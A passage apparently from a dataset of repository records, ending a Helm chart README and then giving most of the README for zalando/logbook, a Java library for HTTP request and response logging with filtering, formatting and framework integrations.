charts/nukkit` - -Or, with some different values: - -``` -helm install nukkit \ - --set image.tag=""arm64"" \ - --set service.type=""LoadBalancer"" \ - charts/nukkit -``` - -Or, the same but with a custom values from a file: - -``` -helm install nukkit \ - -f helm-values.local.yaml \ - charts/nukkit -``` - -Upgrade the chart: - -`helm upgrade nukkit charts/nukkit` - -Testing after deployment: - -`helm test nukkit` - -Completely remove the chart: - -`helm uninstall nukkit` -",0 -zalando/logbook,An extensible Java library for HTTP request and response logging,2015-09-14T15:29:12Z,,"# Logbook: HTTP request and response logging - -[![Logbook](docs/logbook.jpg)](#attributions) - -[![Stability: Active](https://masterminds.github.io/stability/active.svg)](https://masterminds.github.io/stability/active.html) -![Build Status](https://github.com/zalando/logbook/workflows/build/badge.svg) -[![Coverage Status](https://img.shields.io/coveralls/zalando/logbook/main.svg)](https://coveralls.io/r/zalando/logbook) -[![Javadoc](http://javadoc.io/badge/org.zalando/logbook-core.svg)](http://www.javadoc.io/doc/org.zalando/logbook-core) -[![Release](https://img.shields.io/github/release/zalando/logbook.svg)](https://github.com/zalando/logbook/releases) -[![Maven Central](https://img.shields.io/maven-central/v/org.zalando/logbook-parent.svg)](https://maven-badges.herokuapp.com/maven-central/org.zalando/logbook-parent) -[![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/zalando/logbook/main/LICENSE) -[![Project Map](https://sourcespy.com/shield.svg)](https://sourcespy.com/github/zalandologbook/) - -> **Logbook** noun, /lɑɡ bʊk/: A book in which measurements from the ship's log are recorded, along with other salient details of the voyage. - -**Logbook** is an extensible Java library to enable complete request and response logging for different client- and server-side technologies. It satisfies a special need by a) allowing web application -developers to log any HTTP traffic that an application receives or sends b) in a way that makes it easy to persist and analyze it later. This can be useful for traditional log analysis, meeting audit -requirements or investigating individual historic traffic issues. - -Logbook is ready to use out of the box for most common setups. Even for uncommon applications and technologies, it should be simple to implement the necessary interfaces to connect a -library/framework/etc. to it. - -## Features - -- **Logging**: of HTTP requests and responses, including the body; partial logging (no body) for unauthorized requests -- **Customization**: of logging format, logging destination, and conditions that request to log -- **Support**: for Servlet containers, Apache’s HTTP client, Square's OkHttp, and (via its elegant API) other frameworks -- Optional obfuscation of sensitive data -- [Spring Boot](http://projects.spring.io/spring-boot/) Auto Configuration -- [Scalyr](docs/scalyr.md) compatible -- Sensible defaults - -## Dependencies - -- Java 8 (for Spring 6 / Spring Boot 3 and JAX-RS 3.x, Java 17 is required) -- Any build tool using Maven Central, or direct download -- Servlet Container (optional) -- Apache HTTP Client 4.x **or 5.x** (optional) -- JAX-RS 3.x (aka Jakarta RESTful Web Services) Client and Server (optional) -- JAX-RS 2.x Client and Server (optional) -- Netty 4.x (optional) -- OkHttp 2.x **or 3.x** (optional) -- Spring **6.x** or Spring 5.x (optional, see instructions below) -- Spring Boot **3.x** or 2.x (optional) -- Ktor (optional) -- logstash-logback-encoder 5.x (optional) - -## Installation - -Add the following dependency to your project: - -```xml - - org.zalando - logbook-core - ${logbook.version} - -``` - -### Spring 5 / Spring Boot 2 Support - -For Spring 5 / Spring Boot 2 backwards compatibility please add the following import: - -```xml - - org.zalando - logbook-servlet - ${logbook.version} - javax - -``` - -Additional modules/artifacts of Logbook always share the same version number. - -Alternatively, you can import our *bill of materials*... - -```xml - - - - org.zalando - logbook-bom - ${logbook.version} - pom - import - - - -``` - -
- ... which allows you to omit versions: - -```xml - - org.zalando - logbook-core - - - org.zalando - logbook-httpclient - - - org.zalando - logbook-jaxrs - - - org.zalando - logbook-json - - - org.zalando - logbook-netty - - - org.zalando - logbook-okhttp - - - org.zalando - logbook-okhttp2 - - - org.zalando - logbook-servlet - - - org.zalando - logbook-spring-boot-starter - - - org.zalando - logbook-ktor-common - - - org.zalando - logbook-ktor-client - - - org.zalando - logbook-ktor-server - - - org.zalando - logbook-ktor - - - org.zalando - logbook-logstash - -``` -
- -The logbook logger must be configured to trace level in order to log the requests and responses. With Spring Boot 2 (using Logback) this can be accomplished by adding the following line to your `application.properties` - -``` -logging.level.org.zalando.logbook: TRACE -``` - -## Usage - -All integrations require an instance of `Logbook` which holds all configuration and wires all necessary parts together. -You can either create one using all the defaults: - -```java -Logbook logbook = Logbook.create(); -``` -or create a customized version using the `LogbookBuilder`: - -```java -Logbook logbook = Logbook.builder() - .condition(new CustomCondition()) - .queryFilter(new CustomQueryFilter()) - .pathFilter(new CustomPathFilter()) - .headerFilter(new CustomHeaderFilter()) - .bodyFilter(new CustomBodyFilter()) - .requestFilter(new CustomRequestFilter()) - .responseFilter(new CustomResponseFilter()) - .sink(new DefaultSink( - new CustomHttpLogFormatter(), - new CustomHttpLogWriter() - )) - .build(); -``` - -### Strategy - -Logbook used to have a very rigid strategy how to do request/response logging: - -- Requests/responses are logged separately -- Requests/responses are logged soon as possible -- Requests/responses are logged as a pair or not logged at all - (i.e. no partial logging of traffic) - -Some of those restrictions could be mitigated with custom [`HttpLogWriter`](#writing) -implementations, but they were never ideal. - -Starting with version 2.0 Logbook now comes with a [Strategy pattern](https://en.wikipedia.org/wiki/Strategy_pattern) -at its core. Make sure you read the documentation of the [`Strategy`](logbook-api/src/main/java/org/zalando/logbook/Strategy.java) -interface to understand the implications. - -Logbook comes with some built-in strategies: - -- [`BodyOnlyIfStatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/BodyOnlyIfStatusAtLeastStrategy.java) -- [`StatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/StatusAtLeastStrategy.java) -- [`WithoutBodyStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/WithoutBodyStrategy.java) - -### Attribute Extractor -Starting with version 3.4.0, Logbook is equipped with a feature called *Attribute Extractor*. Attributes are basically a -list of key/value pairs that can be extracted from request and/or response, and logged with them. The idea was sprouted -from [issue 381](https://github.com/zalando/logbook/issues/381), where a feature was requested to extract the subject -claim from JWT tokens in the authorization header. - -The `AttributeExtractor` interface has two `extract` methods: One that can extract attributes from the request only, and -one that has both request and response at its avail. The both return an instance of the `HttpAttributes` class, which is -basically a fancy `Map`. Notice that since the map values are of type `Object`, they should have a -proper `toString()` method in order for them to appear in the logs in a meaningful way. Alternatively, log formatters -can work around this by implementing their own serialization logic. For instance, the built-in log formatter -`JsonHttpLogFormatter` uses `ObjectMapper` to serialize the values. - -Here is an example: - -```java -final class OriginExtractor implements AttributeExtractor { - - @Override - public HttpAttributes extract(final HttpRequest request) { - return HttpAttributes.of(""origin"", request.getOrigin()); - } - -} -``` - -Logbook must then be created by registering this attribute extractor: - -```java -final Logbook logbook = Logbook.builder() - .attributeExtractor(new OriginExtractor()) - .build(); -``` - -This will result in request logs to include something like: -```text -""attributes"":{""origin"":""LOCAL""} -``` - -For more advanced examples, look at the `JwtFirstMatchingClaimExtractor` and `JwtAllMatchingClaimsExtractor` classes. -The former extracts the first claim matching a list of claim names from the request JWT token. -The latter extracts all claims matching a list of claim names from the request JWT token. - -If you require to incorporate multiple `AttributeExtractor`s, you can use the class `CompositeAttributeExtractor`: - -```java -final List extractors = List.of( - extractor1, - extractor2, - extractor3 -); - -final Logbook logbook = Logbook.builder() - .attributeExtractor(new CompositeAttributeExtractor(extractors)) - .build(); -``` - -### Phases - -Logbook works in several different phases: - -1. [Conditional](#conditional), -2. [Filtering](#filtering), -3. [Formatting](#formatting) and -4. [Writing](#writing) - -Each phase is represented by one or more interfaces that can be used for customization. Every phase has a sensible default. - -#### Conditional - -Logging HTTP messages and including their bodies is a rather expensive task, so it makes a lot of sense to disable logging for certain requests. A common use case would be to ignore *health check* -requests from a load balancer, or any request to management endpoints typically issued by developers. - -Defining a condition is as easy as writing a special `Predicate` that decides whether a request (and its corresponding response) should be logged or not. Alternatively you can use and combine -predefined predicates: - -```java -Logbook logbook = Logbook.builder() - .condition(exclude( - requestTo(""/health""), - requestTo(""/admin/**""), - contentType(""application/octet-stream""), - header(""X-Secret"", newHashSet(""1"", ""true"")::contains))) - .build(); -``` - -Exclusion patterns, e.g. `/admin/**`, are loosely following [Ant's style of path patterns](https://ant.apache.org/manual/dirtasks.html#patterns) -without taking the the query string of the URL into consideration. - -#### Filtering - -The goal of *Filtering* is to prevent the logging of certain sensitive parts of HTTP requests and responses. This -usually includes the *Authorization* header, but could also apply to certain plaintext query or form parameters — -e.g. *password*. - -Logbook supports different types of filters: - -| Type | Operates on | Applies to | Default | -|------------------|--------------------------------|------------|-----------------------------------------------------------------------------------| -| `QueryFilter` | Query string | request | `access_token` | -| `PathFilter` | Path | request | n/a | -| `HeaderFilter` | Header (single key-value pair) | both | `Authorization` | -| `BodyFilter` | Content-Type and body | both | json: `access_token` and `refresh_token`
form: `client_secret` and `password` | -| `RequestFilter` | `HttpRequest` | request | Replace binary, multipart and stream bodies. | -| `ResponseFilter` | `HttpResponse` | response | Replace binary, multipart and stream bodies. | - -`QueryFilter`, `PathFilter`, `HeaderFilter` and `BodyFilter` are relatively high-level and should cover all needs in ~90% of all -cases. For more complicated setups one should fallback to the low-level variants, i.e. `RequestFilter` and `ResponseFilter` -respectively (in conjunction with `ForwardingHttpRequest`/`ForwardingHttpResponse`). - -You can configure filters like this: - -```java -import static org.zalando.logbook.core.HeaderFilters.authorization; -import static org.zalando.logbook.core.HeaderFilters.eachHeader; -import static org.zalando.logbook.core.QueryFilters.accessToken; -import static org.zalando.logbook.core.QueryFilters.replaceQuery; - -Logbook logbook = Logbook.builder() - .requestFilter(RequestFilters.replaceBody(message -> contentType(""audio/*"").test(message) ? ""mmh mmh mmh mmh"" : null)) - .responseFilter(ResponseFilters.replaceBody(message -> contentType(""*/*-stream"").test(message) ? ""It just keeps going and going..."" : null)) - .queryFilter(accessToken()) - .queryFilter(replaceQuery(""password"", """")) - .headerFilter(authorization()) - .headerFilter(eachHeader(""X-Secret""::equalsIgnoreCase, """")) - .build(); -``` - -You can configure as many filters as you want - they will run consecutively. - -##### JsonPath body filtering (experimental) - -You can apply [JSON Path](https://github.com/json-path/JsonPath) filtering to JSON bodies. -Here are some examples: - -```java -import static org.zalando.logbook.json.JsonPathBodyFilters.jsonPath; -import static java.util.regex.Pattern.compile; - -Logbook logbook = Logbook.builder() - .bodyFilter(jsonPath(""$.password"").delete()) - .bodyFilter(jsonPath(""$.active"").replace(""unknown"")) - .bodyFilter(jsonPath(""$.address"").replace(""X"")) - .bodyFilter(jsonPath(""$.name"").replace(compile(""^(\\w).+""), ""$1."")) - .bodyFilter(jsonPath(""$.friends.*.name"").replace(compile(""^(\\w).+""), ""$1."")) - .bodyFilter(jsonPath(""$.grades.*"").replace(1.0)) - .build(); -``` - -Take a look at the following example, before and after filtering was applied: - -
- Before - -```json -{ - ""id"": 1, - ""name"": ""Alice"", - ""password"": ""s3cr3t"", - ""active"": true, - ""address"": ""Anhalter Straße 17 13, 67278 Bockenheim an der Weinstraße"", - ""friends"": [ - { - ""id"": 2, - ""name"": ""Bob"" - }, - { - ""id"": 3, - ""name"": ""Charlie"" - } - ], - ""grades"": { - ""Math"": 1.0, - ""English"": 2.2, - ""Science"": 1.9, - ""PE"": 4.0 - } -} -``` -
- -
- After - -```json -{ - ""id"": 1, - ""name"": ""Alice"", - ""active"": ""unknown"", - ""address"": ""XXX"", - ""friends"": [ - { - ""id"": 2, - ""name"": ""B."" - }, - { - ""id"": 3, - ""name"": ""C."" - } - ], - ""grades"": { - ""Math"": 1.0, - ""English"": 1.0, - ""Science"": 1.0, - ""PE"": 1.0 - } -} -``` -
- -#### Correlation - -Logbook uses a *correlation id* to correlate requests and responses. This allows match-related requests and responses that would usually be located in different places in the log file. - -If the default implementation of the correlation id is insufficient for your use case, you may provide a custom implementation: - -```java -Logbook logbook = Logbook.builder() - .correlationId(new CustomCorrelationId()) - .build(); -``` - -#### Formatting - -*Formatting* defines how requests and responses will be transformed to strings basically. Formatters do **not** specify where requests and responses are logged to — writers do that work. - -Logbook comes with two different default formatters: *HTTP* and *JSON*. - -##### HTTP - -*HTTP* is the default formatting style, provided by the `DefaultHttpLogFormatter`. It is primarily designed to be used for local development and debugging, not for production use. This is because it’s -not as readily machine-readable as JSON. - -###### Request - -```http -Incoming Request: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b -GET http://example.org/test HTTP/1.1 -Accept: application/json -Host: localhost -Content-Type: text/plain - -Hello world! -``` - -###### Response - -```http -Outgoing Response: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b -Duration: 25 ms -HTTP/1.1 200 -Content-Type: application/json - -{""value"":""Hello world!""} -``` - -##### JSON - -*JSON* is an alternative formatting style, provided by the `JsonHttpLogFormatter`. Unlike HTTP, it is primarily designed for production use — parsers and log consumers can easily consume it. - -Requires the following dependency: - -```xml - - org.zalando - logbook-json - -``` - -###### Request - -```json -{ - ""origin"": ""remote"", - ""type"": ""request"", - ""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"", - ""protocol"": ""HTTP/1.1"", - ""sender"": ""127.0.0.1"", - ""method"": ""GET"", - ""uri"": ""http://example.org/test"", - ""host"": ""example.org"", - ""path"": ""/test"", - ""scheme"": ""http"", - ""port"": null, - ""headers"": { - ""Accept"": [""application/json""], - ""Content-Type"": [""text/plain""] - }, - ""body"": ""Hello world!"" -} -``` - -###### Response - -```json -{ - ""origin"": ""local"", - ""type"": ""response"", - ""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"", - ""duration"": 25, - ""protocol"": ""HTTP/1.1"", - ""status"": 200, - ""headers"": { - ""Content-Type"": [""text/plain""] - }, - ""body"": ""Hello world!"" -} -``` - -Note: Bodies of type `application/json` (and `application/*+json`) will be *inlined* into the resulting JSON tree. I.e., -a JSON response body will **not** be escaped and represented as a string: - -```json -{ - ""origin"": ""local"", - ""type"": ""response"", - ""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"", - ""duration"": 25, - ""protocol"": ""HTTP/1.1"", - ""status"": 200, - ""headers"": { - ""Content-Type"": [""application/json""] - }, - ""body"": { - ""greeting"": ""Hello, world!"" - } -} -``` - -##### Common Log Format - -The Common Log Format ([CLF](https://httpd.apache.org/docs/trunk/logs.html#common)) is a standardized text file format used by web servers when generating server log files. The format is supported via -the `CommonsLogFormatSink`: - -```text -185.85.220.253 - - [02/Aug/2019:08:16:41 0000] ""GET /search?q=zalando HTTP/1.1"" 200 - -``` - -##### Extended Log Format - -The Extended Log Format ([ELF](https://en.wikipedia.org/wiki/Extended_Log_Format)) is a standardised text file format, like Common Log Format (CLF), that is used by web servers when generating log -files, but ELF files provide more information and flexibility. The format is supported via the `ExtendedLogFormatSink`. -Also see [W3C](https://www.w3.org/TR/WD-logfile.html) document. - -Default fields: - -```text -date time c-ip s-dns cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-bytes time-taken cs-protocol cs(User-Agent) cs(Cookie) cs(Referrer) -``` - -Default log output example: - -```text -2019-08-02 08:16:41 185.85.220.253 localhost POST /search ?q=zalando 200 21 20 0.125 HTTP/1.1 ""Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"" ""name=value"" ""https://example.com/page?q=123"" -``` - -Users may override default fields with their custom fields through the constructor of `ExtendedLogFormatSink`: - -```java -new ExtendedLogFormatSink(new DefaultHttpLogWriter(),""date time cs(Custom-Request-Header) sc(Custom-Response-Header)"") -``` - -For Http header fields: `cs(Any-Header)` and `sc(Any-Header)`, users could specify any headers they want to extract from the request. - -Other supported fields are listed in the value of `ExtendedLogFormatSink.Field`, which can be put in the custom field expression. - -##### cURL - -*cURL* is an alternative formatting style, provided by the `CurlHttpLogFormatter` which will render requests as -executable [`cURL`](https://curl.haxx.se/) commands. Unlike JSON, it is primarily designed for humans. - -###### Request - -```bash -curl -v -X GET 'http://localhost/test' -H 'Accept: application/json' -``` - -###### Response - -See [HTTP](#http) or provide own fallback for responses: - -```java -new CurlHttpLogFormatter(new JsonHttpLogFormatter()); -``` - -##### Splunk - -*Splunk* is an alternative formatting style, provided by the `SplunkHttpLogFormatter` which will render -requests and response as key-value pairs. - -###### Request - -```text -origin=remote type=request correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b protocol=HTTP/1.1 sender=127.0.0.1 method=POST uri=http://example.org/test host=example.org scheme=http port=null path=/test headers={Accept=[application/json], Content-Type=[text/plain]} body=Hello world! - -``` - -###### Response - -```text -origin=local type=response correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b duration=25 protocol=HTTP/1.1 status=200 headers={Content-Type=[text/plain]} body=Hello world! -``` - -#### Writing - -Writing defines where formatted requests and responses are written to. Logbook comes with three implementations: -Logger, Stream and Chunking. - -##### Logger - -By default, requests and responses are logged with an *slf4j* logger that uses the `org.zalando.logbook.Logbook` -category and the log level `trace`. This can be customized: - -```java -Logbook logbook = Logbook.builder() - .sink(new DefaultSink( - new DefaultHttpLogFormatter(), - new DefaultHttpLogWriter() - )) - .build(); -``` - -##### Stream - -An alternative implementation is to log requests and responses to a `PrintStream`, e.g. `System.out` or `System.err`. This is usually a bad choice for running in production, but can sometimes be -useful for short-term local development and/or investigation. - -```java -Logbook logbook = Logbook.builder() - .sink(new DefaultSink( - new DefaultHttpLogFormatter(), - new StreamHttpLogWriter(System.err) - )) - .build(); -``` - -##### Chunking - -The `ChunkingSink` will split long messages into smaller chunks and will write them individually while delegating to another sink: - -```java -Logbook logbook = Logbook.builder() - .sink(new ChunkingSink(sink, 1000)) - .build(); - -``` - -#### Sink - -The combination of `HttpLogFormatter` and `HttpLogWriter` suits most use cases well, but it has limitations. -Implementing the `Sink` interface directly allows for more sophisticated use cases, e.g. writing requests/responses -to a structured persistent storage like a database. - -Multiple sinks can be combined into one using the `CompositeSink`. - -### Servlet - -You’ll have to register the `LogbookFilter` as a `Filter` in your filter chain — either in your `web.xml` file (please note that the xml approach will use all the defaults and is not configurable): - -```xml - - LogbookFilter - org.zalando.logbook.servlet.LogbookFilter - - - LogbookFilter - /* - REQUEST - ASYNC - -``` - -or programmatically, via the `ServletContext`: - -```java -context.addFilter(""LogbookFilter"", new LogbookFilter(logbook)) - .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*""); -``` - -**Beware**: The `ERROR` dispatch is not supported. You're strongly advised to produce error responses within the -`REQUEST` or `ASNYC` dispatch. - -The `LogbookFilter` will, by default, treat requests with a `application/x-www-form-urlencoded` body not different from -any other request, i.e you will see the request body in the logs. The downside of this approach is that you won't be -able to use any of the `HttpServletRequest.getParameter*(..)` methods. See issue [#94](../../issues/94) for some more -details. - -#### Form Requests - -As of Logbook 1.5.0, you can now specify one of three strategies that define how Logbook deals with this situation by -using the `logbook.servlet.form-request` system property: - -| Value | Pros | Cons | -|------------------|-----------------------------------------------------------------------------------|----------------------------------------------------| -| `body` (default) | Body is logged | Downstream code can **not use `getParameter*()`** | -| `parameter` | Body is logged (but it's reconstructed from parameters) | Downstream code can **not use `getInputStream()`** | -| `off` | Downstream code can decide whether to use `getInputStream()` or `getParameter*()` | Body is **not logged** | - -#### Security - -Secure applications usually need a slightly different setup. You should generally avoid logging unauthorized requests, especially the body, because it quickly allows attackers to flood your logfile — -and, consequently, your precious disk space. Assuming that your application handles authorization inside another filter, you have two choices: - -- Don't log unauthorized requests -- Log unauthorized requests without the request body - -You can easily achieve the former setup by placing the `LogbookFilter` after your security filter. The latter is a little bit more sophisticated. You’ll need two `LogbookFilter` instances — one before -your security filter, and one after it: - -```java -context.addFilter(""SecureLogbookFilter"", new SecureLogbookFilter(logbook)) - .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*""); -context.addFilter(""securityFilter"", new SecurityFilter()) - .addMappingForUrlPatterns(EnumSet.of(REQUEST), true, ""/*""); -context.addFilter(""LogbookFilter"", new LogbookFilter(logbook)) - .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*""); -``` - -The first logbook filter will log unauthorized requests **only**. The second filter will log authorized requests, as always. - -### HTTP Client - -The `logbook-httpclient` module contains both an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`: - -```java -CloseableHttpClient client = HttpClientBuilder.create() - .addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook)) - .addInterceptorFirst(new LogbookHttpResponseInterceptor()) - .build(); -``` - -Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient` there is another way to log responses: - -```java -CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create() - .addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook)) - .build(); - -// and then wrap your response consumer -client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback) -``` - -### HTTP Client 5 - -The `logbook-httpclient5` module contains an `ExecHandler` to use with the `HttpClient`: -```java -CloseableHttpClient client = HttpClientBuilder.create() - .addExecInterceptorFirst(""Logbook"", new LogbookHttpExecHandler(logbook)) - .build(); -``` -The Handler should be added first, such that a compression is performed after logging and decompression is performed before logging. - -To avoid a breaking change, there is also an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`, which works fine as long as compression (or other ExecHandlers) is -not used: - -```java -CloseableHttpClient client = HttpClientBuilder.create() - .addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook)) - .addResponseInterceptorFirst(new LogbookHttpResponseInterceptor()) - .build(); -``` - -Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient` there is another way to log responses: - -```java -CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create() - .addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook)) - .build(); - -// and then wrap your response consumer -client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback) -``` - -### JAX-RS 2.x and 3.x (aka Jakarta RESTful Web Services) - -> [!NOTE] -> **Support for JAX-RS 2.x** -> -> JAX-RS 2.x (legacy) support was dropped in Logbook 3.0 to 3.6. -> -> As of Logbook 3.7, JAX-RS 2.x support is back. -> -> However, you need to add the `javax` **classifier** to use the proper Logbook module: -> -> ```xml -> -> org.zalando -> logbook-jaxrs -> ${logbook.version} -> javax -> -> ``` -> -> You should also make sure that the following dependencies are on your classpath. -> By default, `logbook-jaxrs` imports `jersey-client 3.x`, which is not compatible with JAX-RS 2.x: -> -> * [jersey-client 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.core/jersey-client/2.41) -> * [jersey-hk2 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.inject/jersey-hk2/2.41) -> * [javax.activation](https://mvnrepository.com/artifact/javax.activation/activation/1.1.1) - -The `logbook-jaxrs` module contains: - -A `LogbookClientFilter` to be used for applications making HTTP requests - -```java -client.register(new LogbookClientFilter(logbook)); -``` - -A `LogbookServerFilter` for be used with HTTP servers - -```java -resourceConfig.register(new LogbookServerFilter(logbook)); -``` - -### JDK HTTP Server - -The `logbook-jdkserver` module provides support for -[JDK HTTP server](https://docs.oracle.com/javase/8/docs/jre/api/net/httpserver/spec/com/sun/net/httpserver/HttpServer.html) -and contains: - -A `LogbookFilter` to be used with the builtin server - -```java -httpServer.createContext(path,handler).getFilters().add(new LogbookFilter(logbook)) -``` - -### Netty - -The `logbook-netty` module contains: - -A `LogbookClientHandler` to be used with an `HttpClient`: - -```java -HttpClient httpClient = - HttpClient.create() - .doOnConnected( - (connection -> connection.addHandlerLast(new LogbookClientHandler(logbook))) - ); -``` - -A `LogbookServerHandler` for use used with an `HttpServer`: - -```java -HttpServer httpServer = - HttpServer.create() - .doOnConnection( - connection -> connection.addHandlerLast(new LogbookServerHandler(logbook)) - ); -``` - -#### Spring WebFlux - -Users of Spring WebFlux can pick any of the following options: - -- Programmatically create a `NettyWebServer` (passing an `HttpServer`) -- Register a custom `NettyServerCustomizer` -- Programmatically create a `ReactorClientHttpConnector` (passing an `HttpClient`) -- Register a custom `WebClientCustomizer` -- Use separate connector-independent module `logbook-spring-webflux` - -#### Micronaut - -Users of Micronaut can follow the [official docs](https://docs.micronaut.io/snapshot/guide/index.html#nettyClientPipeline) on how to integrate Logbook with Micronaut. - -:warning: Even though Quarkus and Vert.x use Netty under the hood, unfortunately neither of them allows accessing or customizing it (yet). - -### OkHttp v2.x - -The `logbook-okhttp2` module contains an `Interceptor` to use with version 2.x of the `OkHttpClient`: - -```java -OkHttpClient client = new OkHttpClient(); -client.networkInterceptors().add(new LogbookInterceptor(logbook)); -``` - -If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition. -The transparent gzip support built into OkHttp will run after any network interceptor which forces -logbook to log compressed binary responses. - -```java -OkHttpClient client = new OkHttpClient(); -client.networkInterceptors().add(new LogbookInterceptor(logbook)); -client.networkInterceptors().add(new GzipInterceptor()); -``` - -### OkHttp v3.x - -The `logbook-okhttp` module contains an `Interceptor` to use with version 3.x of the `OkHttpClient`: - -```java -OkHttpClient client = new OkHttpClient.Builder() - .addNetworkInterceptor(new LogbookInterceptor(logbook)) - .build(); -``` - -If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition. -The transparent gzip support built into OkHttp will run after any network interceptor which forces -logbook to log compressed binary responses. - -```java -OkHttpClient client = new OkHttpClient.Builder() - .addNetworkInterceptor(new LogbookInterceptor(logbook)) - .addNetworkInterceptor(new GzipInterceptor()) - .build(); -``` - -### Ktor - -The `logbook-ktor-client` module contains: - -A `LogbookClient` to be used with an `HttpClient`: - -```kotlin -private val client = HttpClient(CIO) { - install(LogbookClient) { - logbook = logbook - } -} -``` - -The `logbook-ktor-server` module contains: - -A `LogbookServer` to be used with an `Application`: - -```kotlin -private val server = embeddedServer(CIO) { - install(LogbookServer) { - logbook = logbook - } -} -``` - -Alternatively, you can use `logbook-ktor`, which ships both `logbook-ktor-client` and `logbook-ktor-server` modules. - -### Spring -The `logbook-spring` module contains a `ClientHttpRequestInterceptor` to use with `RestTemplate`: - -```java - LogbookClientHttpRequestInterceptor interceptor = new LogbookClientHttpRequestInterceptor(logbook); - RestTemplate restTemplate = new RestTemplate(); - restTemplate.getInterceptors().add(interceptor); -``` - -### Spring Boot Starter - -Logbook comes with a convenient auto configuration for Spring Boot users. It sets up all of the following parts automatically with sensible defaults: - -- Servlet filter -- Second Servlet filter for unauthorized requests (if Spring Security is detected) -- Header-/Parameter-/Body-Filters -- HTTP-/JSON-style formatter -- Logging writer - -Instead of declaring a dependency to `logbook-core` declare one to the Spring Boot Starter: - -```xml - - org.zalando - logbook-spring-boot-starter - ${logbook.version} - -``` - -Every bean can be overridden and customized if needed, e.g. like this: - -```java -@Bean -public BodyFilter bodyFilter() { - return merge( - defaultValue(), - replaceJsonStringProperty(singleton(""secret""), ""XXX"")); -} -``` - -Please refer to [`LogbookAutoConfiguration`](logbook-spring-boot-autoconfigure/src/main/java/org/zalando/logbook/autoconfigure/LogbookAutoConfiguration.java) -or the following table to see a list of possible integration points: - -| Type | Name | Default | -|--------------------------|-----------------------|---------------------------------------------------------------------------| -| `FilterRegistrationBean` | `secureLogbookFilter` | Based on `LogbookFilter` | -| `FilterRegistrationBean` | `logbookFilter` | Based on `LogbookFilter` | -| `Logbook` | | Based on condition, filters, formatter and writer | -| `Predicate` | `requestCondition` | No filter; is later combined with `logbook.exclude` and `logbook.exclude` | -| `HeaderFilter` | | Based on `logbook.obfuscate.headers` | -| `PathFilter` | | Based on `logbook.obfuscate.paths` | -| `QueryFilter` | | Based on `logbook.obfuscate.parameters` | -| `BodyFilter` | | `BodyFilters.defaultValue()`, see [filtering](#filtering) | -| `RequestFilter` | | `RequestFilters.defaultValue()`, see [filtering](#filtering) | -| `ResponseFilter` | | `ResponseFilters.defaultValue()`, see [filtering](#filtering) | -| `Strategy` | | `DefaultStrategy` | -| `AttributeExtractor` | | `NoOpAttributeExtractor` | -| `Sink` | | `DefaultSink` | -| `HttpLogFormatter` | | `JsonHttpLogFormatter` | -| `HttpLogWriter` | | `DefaultHttpLogWriter` | - -Multiple filters are merged into one. - -#### Autoconfigured beans from `logbook-spring` -Some classes from `logbook-spring` are included in the auto configuration. - -You can autowire `LogbookClientHttpRequestInterceptor` with code like: -```java -private final RestTemplate restTemplate; -MyClient(RestTemplateBuilder builder, LogbookClientHttpRequestInterceptor interceptor){ - this.restTemplate = builder - .additionalInterceptors(interceptor) - .build(); -} -``` - -#### Configuration - -The following tables show the available configuration (sorted alphabetically): - -| Configuration | Description | Default | -|------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------| -| `logbook.attribute-extractors` | List of [AttributeExtractor](#attribute-extractor)s, including configurations such as `type` (currently `JwtFirstMatchingClaimExtractor` or `JwtAllMatchingClaimsExtractor`), `claim-names` and `claim-key`. | `[]` | -| `logbook.filter.enabled` | Enable the [`LogbookFilter`](#servlet) | `true` | -| `logbook.filter.form-request-mode` | Determines how [form requests](#form-requests) are handled | `body` | -| `logbook.filters.body.default-enabled` | Enables/disables default body filters that are collected by java.util.ServiceLoader | `true` | -| `logbook.format.style` | [Formatting style](#formatting) (`http`, `json`, `curl` or `splunk`) | `json` | -| `logbook.httpclient.decompress-response` | Enables/disables additional decompression process for HttpClient with gzip encoded body (to logging purposes only). This means extra decompression and possible performance impact. | `false` (disabled) | -| `logbook.minimum-status` | Minimum status to enable logging (`status-at-least` and `body-only-if-status-at-least`) | `400` | -| `logbook.obfuscate.headers` | List of header names that need obfuscation | `[Authorization]` | -| `logbook.obfuscate.json-body-fields` | List of JSON body fields to be obfuscated | `[]` | -| `logbook.obfuscate.parameters` | List of parameter names that need obfuscation | `[access_token]` | -| `logbook.obfuscate.paths` | List of paths that need obfuscation. Check [Filtering](#filtering) for syntax. | `[]` | -| `logbook.obfuscate.replacement` | A value to be used instead of an obfuscated one | `XXX` | -| `logbook.predicate.include` | Include only certain paths and methods (if defined) | `[]` | -| 